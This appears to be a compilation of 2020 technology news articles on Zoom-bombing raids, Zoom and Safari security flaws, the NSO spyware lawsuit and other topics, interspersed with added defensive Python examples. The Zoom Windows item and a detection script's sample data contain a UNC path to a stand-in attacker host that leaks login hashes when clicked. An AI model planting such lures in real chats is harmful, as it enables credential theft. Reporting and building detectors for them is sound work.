For those unaware, Zoom officially has a porn problem. The multibillion-dollar video messaging mainstay among employees at Johnson & Johnson and the Department of Homeland Security—not to mention a household name among currently house-bound citizens across the country—has been rocked by story after story of pranksters popping into video meetings with clips of graphic porn or Nazi memorabilia. None of Zoom’s clients, seemingly, are safe: These Zoom bombs have hit city council members and churches alike. They’ve hit Chipotle.
The idea of having our work-from-home happy hours disrupted by someone splicing in something porn-y or Hitler-y is disturbing, and that’s where it usually ends: annoyance, disgust, shock—which is ultimately the response that these posters are trying to incite. But a Gizmodo investigation into multiple Discord chatrooms dedicated to coordinating these attacks revealed that the practice has a far darker side that can leave victims scarred for life—or far worse.
Zoom-based “bombs” and “raids” are typically the forte of high and middle school students whose classes are now almost exclusively taking place on the platform. From last month onward, Zoom’s rolled out a series of changes specifically catering to the educators it has onboard, from lifting the 40-minute limit on free meetings internationally to partnering with Logitech to offer free cameras and headsets to teachers who might need them. This gesture of goodwill promptly blew up in the company’s face when these students quickly realized that the codes and passwords needed to access a given Zoom meeting could be freely shared, leading a select few to coordinate with other students nationwide to spearhead a wave of raids in classrooms across the country.
Screenshot: Gizmodo (Discord)
Teens, in general, have a thing for Discord, a popular chat platform, and Discord is where these raids are coordinated. The platform’s long track record of raids on every platform led it to wedge a statement into its community guidelines explicitly disavowing raids as a “form of harassment.” Now that those raids have hit Zoom, Discord’s been actively booting off some users that are particularly active in a given raid channel, while unceremoniously shutting those channels down left and right.
This crackdown, along with the shuttering of raid-based communities on Reddit like the creatively named r/zoomraids, means that a lot of these channels are hard to find, and that finding them isn’t a guarantee that they’ll exist the next day. Over the course of this story, Gizmodo joined about 15 raid channels—some racking up more than 800 members a pop. By the time you’re reading this, there are at most six left standing—and for the most part, they are hidden behind server names that don’t mention Zoom at all. Discord told Gizmodo in an email that it had removed more than 350 servers for Zoom bombing just this morning.
“This behavior violates Discord’s terms of service, and we strongly condemn it,” a spokesperson told Gizmodo in a statement. “Once we identify those servers engaging in this sort of activity, we quickly investigate and take action, including removing content, banning users and shutting down those servers.”
The bulk of these servers, overall, are made up of teens not only swapping Zoom links back and forth but overall just… being typical edgelord teens—joking about the Holocaust (ironically), using racial slurs (ironically), and sharing a ton of porn (ironically?). Less ironic, but just as dark, are the materials shared back and forth to make these campaigns a reality. Multiple channels that Gizmodo joined had created a roster of Google documents listing the Zoom codes of hundreds of support groups in the U.S., along with the days and times each one would meet. Similar documents were created to target meetings for other at-risk groups, like LGBTQ and trans teens.
The Wednesday meetings from the manifesto detailing nearly 200 meetings happening weekly nationwide. Zoom codes are censored.
Screenshot: Gizmodo (Discord)
Depending on who you ask, raids on recovery groups are either lame, funny, fucked, or some combination of the three. Each of the Discord channels had a list of rules seemingly tailored to throw admins off the scent of the channel’s true purpose. One server’s rulebook stated that its one goal was to “support our fellow students and adults through their hard day of work by surprising them in their online meetings.” Another server for raid planning included the rule, “DO NOT RAID I DO NOT CONDONE IT.”
In many of the channels, all Zoom calls are fair game, whether it’s a Narcotics Anonymous meeting or a kindergarten classroom. Rules aside, the only limit to what’s being shared is in the hands of the poster: Some think playing footage of the 2019 Christchurch Mosque shooting in the middle of an NA meeting is a bridge too far, while others don’t. Some think exposing 9- and 10-year-olds to hardcore porn is too shitty, while others think the line should be drawn at middle schoolers and above.
As one user put it, “this discord freakin showed porn to kindergardners but wont raid an narcotics [anonymous]? y’all soft.”
Screenshot: Gizmodo (Discord)
While Zoom’s yet to respond to our request for comment, the company is undoubtedly aware of its raiding problem. Late last month, it put out an official blog post about “keeping uninvited guests” out of Zoom meetings, which reminds users, “When you share your meeting link on social media or other public forums, that makes your event … extremely public. ANYONE with the link can join your meeting.”
Some of the channels Gizmodo joined did, indeed, set up scrapers and dedicated bots specifically to monitor a Zoom link shared on a given platform. But just as many used a much easier tool: Google search. As confirmed by Gizmodo, public-facing Zoom links share a specific string of characters that, when plugged into Google search (or “dorked,” in internet parlance), will turn up dozens of upcoming Zoom meetings. Trying the search term ourselves, we were able to pull links for Zooms dedicated to hot yoga, wine tasting, and legal advice—all in less than a minute—not to mention more than a few Zooms dedicated to parents and their kids.
Putting young children at risk of exposure to horrifying imagery comes up more frequently than you might think, since Zoom’s teacher-friendly packages apply to preschool teachers as much as they do to college professors. And just like Zoom bombings aimed at high school classes, the reactions of these young children can be passed around in videos recorded by the bombers. In the barely 24 hours we spent joining more than a dozen channels, one video—which showed the confused reactions of second graders being exposed to graphic hardcore pornography in the middle of their class—was frequently shared.
For what should be obvious reasons, we didn’t join any of the many, many raids linked at any given time, so we can’t specify what other young children might be seeing. If we’re assuming the worst, then that means some kids on these video calls are being exposed to footage of decapitation or shootings from sites like Bestgore and LiveLeak, along with any porn scenario you can imagine. Assuming the best-case scenario, the porn’s still there, but the murders aren’t. In either case, kids are at risk: Psychologists have been telling us for years that exposing children to hardcore pornography bumps up the chance that they’ll either become the victim of sexual assault or end up assaulting someone themselves. Seeing the types of horrific violence you’d find on any gore site can haunt children for the rest of their lives, leading to PTSD or drug abuse.
Screenshot: Gizmodo (Discord)
And when it comes to meetings involving drug abuse, the harm done by these kinds of bombings cannot be overstated. As one Business Insider employee—and Alcoholics Anonymous member—recently explained, the isolation that comes with coronavirus-mandated quarantines is incredibly dangerous for those struggling with addiction:
We are all in our separate homes. And that can be dangerous, because alcoholics are notorious for isolating, for withdrawing from social situations — sometimes with a bottle.
If you drink normally, you may be wondering, ‘Why not just drink — even if you have a problem? Right now, while locked down, who could that hurt?’ I can answer that. I drank myself into the emergency room years ago. I know many people who did. Do you think hospitals need that right now? Do you think healthcare workers need to deal with millions of people whose immune systems are severely compromised by binge drinking?
Screenshot: Gizmodo (Discord)
The risk of relapse doesn’t just come for alcoholics, but anyone with any addiction. As one recent Rolling Stone report detailed, these sorts of weekly meetings can turn into not only a place to discuss their road to recovery but also a place that feels safe to talk about their inarguably valid fears surrounding the current pandemic. When that support line is intercepted—by an edgy teen or otherwise—a recovering addict can lose that tenuous feeling of safety and withdraw from meetings with the support group keeping them clean.
Without that network, some folks fare well and others don’t, with relapse being a bigger risk to those earlier on in recovery, as the Business Insider report explains. For some addictions, like opioids, a relapse can turn deadly shockingly fast. As pointed out by the Centers for Disease Control in 2018, some 70 percent of the tens of thousands of annual drug overdoses in the U.S. happen because of opiate addiction.
Of course, people being dangerously shitty to each other is nothing new. Nor are online pranks. What makes Zoom bombing so wretched is that it’s happening at a time when millions of us are stuck inside with nowhere to go except, perhaps, into a video call with our friends and family, teachers, and support communities—our last tethers to the lives we used to have.
NSO Group – sued by Facebook for developing Pegasus spyware that targeted WhatsApp users – this week claimed Facebook tried to license the very same surveillance software to snoop on its own social-media addicts.
The Israeli spyware maker’s CEO Shalev Hulio alleged in a statement [PDF] to a US federal district court that in 2017 he was approached by Facebook reps who wanted to use NSO’s Pegasus technology in Facebook’s controversial Onavo Protect app to track mobile users.
Pegasus is designed to, once installed on a device, harvest its text messages, gather information about its apps, eavesdrop on calls, track its location, and harvest passwords, among other things.
Onavo Protect, acquired by Facebook in 2013, was available for Android and iOS. It used VPN tunneling to wrap users’ internet connections in encryption, shielding their information as it traveled over untrusted and insecure Wi-Fi networks and the like. The iOS version also blocked harmful websites. However, the software blabbed telemetry about its users to Facebook as well as routed connections through Onavo servers, which could monitor people’s online activities. The application was forced out of the Apple iOS store in 2018 for siphoning information about other programs installed on devices, and discontinued in May 2019.
According to the NSO chief exec, Onavo Protect needed more surveillance powers on iOS handhelds, and so Facebook turned to the spyware maker for its technology.
“The Facebook representatives stated that Facebook was concerned that its method for gathering user data through Onavo Protect was less effective on Apple devices than on Android devices,” Hulio alleged.
“The Facebook representatives also stated that Facebook wanted to use purported capabilities of Pegasus to monitor users on Apple devices and were willing to pay for the ability to monitor Onavo Protect users.”
Because NSO only sells to governments and not private companies, Hulio claimed, he turned down the Facebook licensing offer.
Facebook, in a statement to The Register, characterized the allegations as a distraction from its legal battle against NSO, which kicked off in October 2019. The web giant claims NSO, working on behalf of its customers, illegally hacked targets via security vulnerabilities in Facebook-owned WhatsApp’s code to install Pegasus on devices.
“NSO is trying to distract from the facts Facebook and WhatsApp filed in court nearly six months ago. Their attempt to avoid responsibility includes inaccurate representations about both their spyware and a discussion with people who work at Facebook,” a Facebook spokesperson said.
“Our lawsuit describes how NSO is responsible for attacking over 100 human rights activists and journalists around the world. NSO CEO Shalev Hulio has admitted his company can attack devices without a user knowing and he can see who has been targeted with Pegasus. We look forward to proving our case against NSO in court and seeking accountability for their actions.”
The case has been unusual from the start, with Facebook filing suit after first deleting NSO workers’ personal Facebook accounts. The spyware maker then missed its scheduled court appearance because, it was alleged, Facebook did not properly serve its paperwork.
NSO reckons Facebook’s accusations are baseless because it only sells its software to government departments and agencies, and does not operate the tools itself. Thus, we’re told, it didn’t hack anyone itself, and it cannot be held accountable for the actions of its customers. NSO also noted it only deals with governments allowed under Israeli export laws.
Further, NSO contended the court, in Oakland, California, does not have jurisdiction to hear this case due to America’s Foreign Sovereign Immunity Act, and it argued that the actions described in the lawsuit wouldn’t even run afoul of its spyware’s terms of service.
This week, SpaceX workers in South Texas loaded the third full-scale Starship prototype—SN3—onto a test stand at the company’s Boca Chica launch site. On Wednesday night, they pressure-tested the vehicle at ambient temperature with nitrogen, and SN3 performed fine.
On Thursday night SpaceX began cryo-testing the vehicle, which means it was loaded again with nitrogen, but this time it was chilled to flight-like temperatures and put under flight-like pressures. Unfortunately, a little after 2am local time, SN3 failed and began to collapse on top of itself. It appeared as if the vehicle may have lost pressurization and become top-heavy.
Shortly after the failure, SpaceX’s founder and chief engineer, Elon Musk, said on Twitter, “We will see what data review says in the morning, but this may have been a test configuration mistake.” A testing issue would be good in the sense that it means the vehicle itself performed well, and the problem can be more easily addressed.
This is the third time a Starship has failed during these proof tests that precede engine tests and, potentially, flight tests. Multiple sources indicated that had these preliminary tests succeeded, SN3 would have attempted a 150-meter flight test as early as next Tuesday.
Here’s a recap of SpaceX’s efforts to test full-size Starships to date:
Starship Mk1: Construction began in December, 2018. Failed during pressure test in November, 2019.
Starship SN1: Construction began in October, 2019. Failed during a pressure test on Feb. 28.
Starship SN2: Construction began in Feb., 2020. After SN1 failure, was converted into a test bed for thrust puck at base of rocket. Passed test on March 8, and was retired.
Starship SN3: Construction began in March, 2020. Cryogenic test failure on April 3.
Starship SN4: Construction began in March, 2020. Testing begins later this month?
This failure has to be a disappointment in that the prototype rocket failed for a third time before getting to Raptor engine tests. And after the SN1 failure, Musk said he told his engineers, “In the future, you treat that rocket like it’s your baby, and you do not send it to the test site unless you think your baby’s going to be OK.”
Apple patched the vulnerabilities in January and March updates. But before the fixes, all a victim would have needed to do is click one malicious link and an attacker would have been able to spy on them remotely.
“Safari encourages users to save their preferences for site permissions, like whether to trust Skype with microphone and camera access,” says Ryan Pickren, the security researcher who disclosed the vulnerabilities to Apple. “So what an attacker could do with this kill chain is make a malicious website that from Safari’s perspective could then turn into ‘Skype’. And then the malicious site will have all the permissions that you previously granted to Skype, which means an attacker could just start taking pictures of you or turn on your microphone or even screen-share.”
The bugs Pickren found all stem from seemingly minor oversights. For example, he discovered that Safari’s list of the permissions a user has granted to websites treated all sorts of URL variations as being part of the same site, like https://www.example.com, http://example.com, and fake://example.com. By “wiggling around,” as Pickren puts it, he was able to generate specially crafted URLs that could work with scripts embedded in a malicious site to launch the bait-and-switch that would trick Safari.
“I just kind of hammered the browser with really weird cases until Safari got confused and gave an origin that didn’t make sense,” he says. “And eventually the bugs could all kind of bounce from one to the next. Part of this is that some of the bugs were really, really old flaws in the WebKit core from years ago. They probably were not as dangerous as they are now just because the stars lined up on how an attacker would use them today.”
A hacker who tricked a victim into clicking their malicious link would be able to quietly launch the target’s webcam and microphone to capture video, take photos, or record audio. And the attack would work on iPhones, iPads, and Macs alike. None of the flaws are in Apple’s microphone and webcam protections themselves, or even in Safari’s defenses that keep malicious sites from accessing the sensors. Instead, the attack surmounts all of these barriers just by generating a convincing disguise.
Pickren submitted seven vulnerabilities to Apple’s bug bounty program in mid-December and says he got a response that the company had validated the bugs the next day. While an attacker would only exploit three of the bugs to take over webcams in the chain Pickren envisioned, he found other, related flaws along the way that he submitted as well. Pickren says that part of the reason he encountered so many extra bugs was that he was looking for an attack chain that would work on both iOS and macOS—and Safari is designed slightly differently for each.
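To make the origin-confusion class of bug concrete, here is an added example (constructed for this page, not Pickren’s or Apple’s code) that contrasts a hypothetical permission store keyed on host alone, which collapses the three URL variations quoted above into one entry, with one keyed on the web origin (scheme, host, effective port). The `PermissionStore` class and both key functions are assumptions for illustration.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def host_only_key(url):
    """Lax grouping (hypothetical sketch of the behaviour described above):
    key the permission store on the bare host, ignoring scheme and port and
    folding away a leading 'www.', so https://www.example.com,
    http://example.com and fake://example.com share one entry."""
    host = (urlsplit(url).hostname or "").lower()
    if host.startswith("www."):
        host = host[4:]
    return host


def origin_key(url):
    """Strict grouping per the web origin model (scheme, host, port).
    Schemes other than http/https get no key at all, so they can never
    inherit a grant made to a real site."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS:
        return None  # treat as an opaque origin that matches nothing
    host = (parts.hostname or "").lower()
    port = parts.port or DEFAULT_PORTS[scheme]
    return (scheme, host, port)


class PermissionStore:
    """Remembers which permissions (e.g. 'camera') a user granted to a site,
    grouped by whatever key function the browser uses."""

    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.grants = {}

    def grant(self, url, permission):
        key = self.key_fn(url)
        if key is not None:
            self.grants.setdefault(key, set()).add(permission)

    def allowed(self, url, permission):
        key = self.key_fn(url)
        if key is None:
            return False
        return permission in self.grants.get(key, set())


def compare_stores():
    """Grant camera access to the trusted site once, then ask each store
    whether the look-alike URLs from the article inherit that grant."""
    trusted = "https://www.example.com"
    lookalikes = ["http://example.com", "fake://example.com"]
    results = {}
    for name, key_fn in (("host_only", host_only_key), ("origin", origin_key)):
        store = PermissionStore(key_fn)
        store.grant(trusted, "camera")
        results[name] = {u: store.allowed(u, "camera") for u in lookalikes}
        results[name][trusted + ":443"] = store.allowed(trusted + ":443", "camera")
    return results


if __name__ == "__main__":
    for name, outcome in compare_stores().items():
        print(name, outcome)
```

With the host-only key, both look-alikes are reported as allowed; with the origin key, only the explicit-port spelling of the trusted site is.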
A study by economists Sergio Correia, Stephan Luck and Emil Verner suggests that the best way to save your economy is to save your people. The authors looked at the economic impact of the Spanish influenza pandemic of 1918 on different U.S. cities. They concluded that the earlier, more forcefully and longer cities responded, the better their economic recovery.
A faculty affiliate from the Harvard Department of Economics writes in Bloomberg: [C]ities that implemented aggressive social distancing and shutdowns to contain the virus came out looking better. Implementing these policies eight days earlier, or maintaining them for 46 days longer were associated with 4% and 6% higher post-pandemic manufacturing employment, respectively. The gains for output were similar. Likewise, faster and longer-lasting distancing measures were associated with higher post-pandemic banking activity…
[T]his is at least consistent with the arguments my Bloomberg Opinion colleagues Noah Smith and Michael Strain have already put forward for why easing distancing measures too early would be potentially devastating for the economy… [I]t looks like the things we should be doing to save lives are also what we should be doing to save the economy.
Now that a large portion of the world is working from home to ride out the coronavirus pandemic, Zoom’s popularity has rocketed, but also has led to an increased focus on the company’s security practices and privacy promises. Hot on the heels of two security researchers finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.
Patrick Wardle, a former NSA hacker and now principal security researcher at Jamf, dropped the two previously undisclosed flaws on his blog Wednesday, which he shared with TechCrunch.
The two bugs, Wardle said, can be launched by a local attacker — that’s where someone has physical control of a vulnerable computer. Once exploited, the attacker can gain and maintain persistent access to the innards of a victim’s computer, allowing them to install malware or spyware.
Wardle’s first bug piggybacks off a previous finding. Zoom uses a “shady” technique — one that’s also used by Mac malware — to install the Mac app without user interaction. Wardle found that a local attacker with low-level user privileges can inject the Zoom installer with malicious code to obtain the highest level of user privileges, known as “root.”
Those root-level user privileges mean the attacker can access the underlying macOS operating system, which is typically off-limits to most users, making it easier to run malware or spyware without the user noticing.
The second bug exploits a flaw in how Zoom handles the webcam and microphone on Macs. Zoom, like any app that needs the webcam and microphone, first requires consent from the user. But Wardle said an attacker can inject malicious code into Zoom to trick it into giving the attacker the same access to the webcam and microphone that Zoom already has. Once Wardle tricked Zoom into loading his malicious code, the code will “automatically inherit” any or all of Zoom’s access rights, he said — and that includes Zoom’s access to the webcam and microphone.
“No additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video,” wrote Wardle.
Because Wardle dropped detail of the vulnerabilities on his blog, Zoom has not yet provided a fix. Zoom also did not respond to TechCrunch’s request for comment.
In the meanwhile, Wardle said, “if you care about your security and privacy, perhaps stop using Zoom.”
Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.
When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.
But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.
Bleeping Computer demonstrated how a regular URL and the UNC path \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.
The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”
And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.
Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.
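As an added illustration (constructed for this page, not Zoom’s or Bleeping Computer’s code) of the defensive side of the problem above: a chat linkifier that turns only http/https URLs into anchors, never UNC paths or other schemes, together with a scan that flags messages carrying UNC paths in exported chat logs. The sample messages are constructed; only the UNC path form mirrors the one quoted in the article.

```python
import html
import re

# Constructed sample chat messages (not real logs); the second reuses the
# UNC path form demonstrated above.
SAMPLE_MESSAGES = [
    "slides are at https://example.com/deck.pdf",
    "check this out \\\\evil.server.com\\images\\cat.jpg",
    "file://server/share/doc.txt",
    "see \\\\10.0.0.5\\share\\q1.xlsx and https://example.org",
    "just text, no links",
]

# Only these schemes become clickable.
ALLOWED_SCHEMES = ("http", "https")

# scheme://rest, capturing the scheme so it can be checked.
URL_RE = re.compile(r"\b([a-zA-Z][a-zA-Z0-9+.-]*)://[^\s]+")

# A UNC path: \\host\share with an optional remainder. Two literal
# backslashes, a host with no backslash or whitespace, a share name, then
# anything up to whitespace.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+(?:\\[^\s]*)?")


def extract_links(text):
    """Return (kind, token) pairs for every link-like token in a message.
    kind is 'url' for http/https, 'blocked-scheme' for any other scheme
    (file://, etc.), and 'unc' for a Windows UNC path."""
    links = []
    for m in URL_RE.finditer(text):
        kind = "url" if m.group(1).lower() in ALLOWED_SCHEMES else "blocked-scheme"
        links.append((kind, m.group(0)))
    for m in UNC_RE.finditer(text):
        links.append(("unc", m.group(0)))
    return links


def render(text):
    """Render a message for display: HTML-escape it, then wrap only
    http/https URLs in anchors. UNC paths and other schemes stay plain text,
    so a click cannot trigger an SMB connection."""
    escaped = html.escape(text, quote=True)

    def to_anchor(m):
        if m.group(1).lower() in ALLOWED_SCHEMES:
            return f'<a href="{m.group(0)}">{m.group(0)}</a>'
        return m.group(0)

    return URL_RE.sub(to_anchor, escaped)


def scan(messages):
    """Detection pass over exported chat messages: return those containing
    a UNC path, the pattern an attacker would have to plant."""
    return [msg for msg in messages if UNC_RE.search(msg)]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print(extract_links(msg), "->", render(msg))
    print("flagged:", scan(SAMPLE_MESSAGES))
```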
Every day, a new Zoom security or privacy issue emerges. At least, that’s the way it seems during the COVID-19 crisis as an increasing number of people use the Zoom video conferencing app while working from home.
The two bugs found by security researcher Patrick Wardle can be used by a local attacker able to gain physical control of a vulnerable Mac. By exploiting the bugs, the adversary can gain access to your computer and install malware or spyware, he wrote in a blog published today.
The first bug is based on another finding by @c1truz_, technical lead at a U.S. threat detection firm called VMRay. He said earlier this week on Twitter: “Ever wondered how the @zoom_us macOS installer does its job without you ever clicking install? Turns out they (ab)use preinstallation scripts, manually unpack the app using a bundled 7zip and install it to /Applications if the current user is in the admin group (no root needed).”
Four global drinks giants are responsible for more than half a million tonnes of plastic pollution in six developing countries each year, enough to cover 83 football pitches every day, according to a report.
The NGO Tearfund has calculated the greenhouse gas emissions from the open burning of plastic bottles, sachets and cartons produced by Coca-Cola, PepsiCo, Nestlé and Unilever in developing nations, where waste can be mismanaged because people do not have access to collections.
Taking a sample of six developing countries, reflecting a spread across the globe, the NGO estimated the burning of plastic packaging put on to the market by the companies creates 4.6m tonnes of carbon dioxide equivalent – equivalent to the emissions from 2m cars.
Tearfund analysed the plastic put on the market in China, India, the Philippines, Brazil, Mexico and Nigeria by the four companies to examine the impact of single use plastic in developing countries. The countries were chosen because they are large developing country markets, spread across three continents.
The sachets, bottles, and cartons sold in these countries often end up either being burned or dumped – creating a pollution problem equivalent to covering 83 football pitches with plastic to 10 centimetres deep each day.
The report says: “This massive plastic pollution footprint, while a crisis in and of itself, is also contributing to the climate crisis.”
It adds that the four companies make little or no mention of emissions from disposal of their products or packaging in their climate change commitments.
“These companies continue to sell billions of products in single-use bottles, sachets and packets in developing countries,” says the report.
“And they do this despite knowing that: waste isn’t properly managed in these contexts; their packaging therefore becomes pollution; and such pollution causes serious harm to the environment and people’s health. Such actions – with such knowledge – are morally indefensible.”
The charity is calling for the companies to urgently switch to refillable and reusable packaging instead of sachets and plastic bottles.
The NGO estimated how much of their plastic waste in each country is mismanaged, burned or dumped using World Bank data.
Apple’s latest update to macOS Catalina appears to have broken SSH for some users.
Developer Tyler Hall published a blog post on Monday detailing the issue, but removed it after his writeup got noticed.
The issue is that under Apple’s macOS 10.15.4 update, released on March 24, trying to open a SSH connection to a port greater than 8192 using a server name, rather than an IP address, no longer works – for some users at least. SSH is a Swiss army knife that can be used to securely connect to remote machines to run commands, transfer files and other data, and so on.
The Register asked Hall to elaborate on his findings but he declined, citing the possibility that the problem might be particular to his set up rather than a bug in the software Apple shipped.
Hall demonstrated similar post-publication remorse this last October when he criticized the code quality of macOS Catalina, comparing it to Windows Vista. That sentiment is shared among many other macOS users (eg: “macOS 10.15 is chockablock with paper-cut bugs” – John Gruber). But the responses Hall received from friends within Apple led him to regret that post, too.
We asked Apple to comment but we’ve received no reply. Cupertino seldom addresses public criticism. Until June 2016, Apple even implied in its App Store Review Guidelines that it would look unfavorably on developers who complain publicly about rejected apps. Up to that point, its policy said, “If you run to the press and trash us, it never helps.”
The US government’s renewed antitrust scrutiny of companies like Amazon, Apple, Facebook, and Google in recent years has perhaps encouraged more caution in publicly declared tech platform policies.
The issue that Hall reported has been noted by others. A post two days ago on Apple’s discussion forum complains, “After that update I am no longer able to open a SSH connection to a port greater than 8192 using server name (instead of IP).” And three discussion participants claim they too have experienced the same issue.
One of these individuals, posting under the user name “webdeck,” filed a bug report in Open Radar, a public iOS and macOS bug reporting site created by developer Tim Burks because Apple hides its Radar bug reporting system from the public.
The bug report reads, “/usr/bin/ssh in macos 10.15.4 hangs if used with the -p flag to specify an alternate port and used with a hostname. This was not present in macOS 10.15.3.”
For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.
OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.
Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTP connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWRT maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.
Exploits not for everyone
These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and that use a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.
It seemed like a bit of a risk when Mazda decided to not offer a touchscreen in the new Mazda 3. But Mazda may have just been ahead of the trend, as Honda has also abandoned some reliance on the new Honda Jazz’s touch controls because they just aren’t “intuitive.”
Despite nearly a decade of dominating conversations about automotive design and not, for some reason, the risks of distracted driving, touchscreens are finally being seen for what they really are: annoying.
Jazz project leader Takeki Tanaka explained: “The reason is quite simple – we wanted to minimise driver disruption for operation, in particular, for the heater and air conditioning.
“We changed it from touchscreen to dial operation, as we received customer feedback that it was difficult to operate intuitively. You had to look at the screen to change the heater seating, therefore, we changed it so one can operate it without looking, giving more confidence while driving.”
And here’s the part where anyone who has reviewed a car in the last decade goes and screams into their pillow with frustration, because that’s exactly the sort of feedback automakers have been getting from focus groups, customers and reviewers for about as long as these touchscreen systems have been in cars.
Touchscreens are worse than touch controls for one very obvious reason: A touchscreen requires two human senses—touch, obviously, and sight. But with enough experience, the genius of the human brain is capable of motor memory, so touch dials and buttons will eventually only require the memory of where it’s located and a finger to touch it. Eyes can stay on the road.
The problem is people want cool technology in their cars. They want to feel like their hard-earned loan is going toward something nice and fancy and smarter than them. This is why some people like the Tesla tablet—they think it’s efficient to put literally thousands of functions all in one very distracting toy. That’s not very safe. It’s safer to put the toys away and just turn a knob to be more comfortable.
Simplicity is the greatest efficiency, and I’m pretty jazzed for a touchscreen-less future. It’s like music to my ears.
Ubisoft thinks it has a simple way to encourage people to stay at home and wait out the COVID-19 pandemic: shower them with games. It’s running a month-long campaign that will give away free games, trials, discounts and other offers to give you something to do while you’re cooped up. It’s starting things off by offering the PC version of Rayman Legends for free on Uplay from now through April 3rd. It’s an old title, to be sure, but it might hit the spot if you’re looking for an upbeat game to remind you that things will get better.
Future offers will be available through Ubisoft’s Free Events site.
There’s no doubt that Ubi is using this partly as a promotional tool for its catalog. You might try a game you skipped the first time around, or might feel compelled to subscribe to Uplay+ to see more. At the same time, it might be particularly useful in some households. Not everyone has a backlog of games to burn through until lockdowns come to an end, let alone the money to buy more.
Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.
The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”
“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.
“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.
Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.
Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.
The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.
Popular video-conferencing app Zoom is leaking the personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.
The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.
“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses,” Barend Gehrels, a Zoom user impacted by the issue who flagged it to Motherboard, wrote in an email.
Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.
“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.
A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard
On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or whose email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”
Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.
On Twitter Motherboard found other instances of Dutch users reporting the same issue.
“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?” one user tweeted last week along with a screenshot.
Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.
“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.
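The grouping rule Zoom describes, and the reason a blocklist of public providers can never quite fix it, as an added Python example that is not Zoom's code: the user records, the example-corp.com domain and the "verified organisation domain" allowlist are all constructed for the illustration (xs4all.nl and dds.nl are the ISP domains named above, but the people on them are made up).

```python
"""Added example: building a "company directory" from the sign-up e-mail
domain. A denylist of public providers keeps leaking because every ISP,
university or regional mail domain not yet on the list silently becomes a
'company'; an allowlist of verified domains fails closed instead.
Constructed data; not Zoom's code."""
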